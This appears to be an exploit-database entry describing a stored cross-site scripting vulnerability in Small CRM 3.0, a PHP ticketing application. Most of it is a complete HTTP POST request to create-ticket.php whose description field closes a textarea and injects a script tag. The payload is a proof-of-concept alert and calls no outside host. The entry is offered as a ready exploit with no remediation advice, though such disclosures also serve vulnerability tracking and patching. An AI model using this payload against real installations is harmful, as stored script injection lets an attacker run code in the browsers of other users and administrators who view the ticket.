# Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 20/10/2021
# Exploit Author: Ghuliev
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: Ubuntu
When a user or admin creates a ticket, we can inject javascript code into
ticket.
POST /crm/create-ticket.php HTTP/1.1
Host: IP
Content-Length: 79
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP/crm/create-ticket.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7
subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send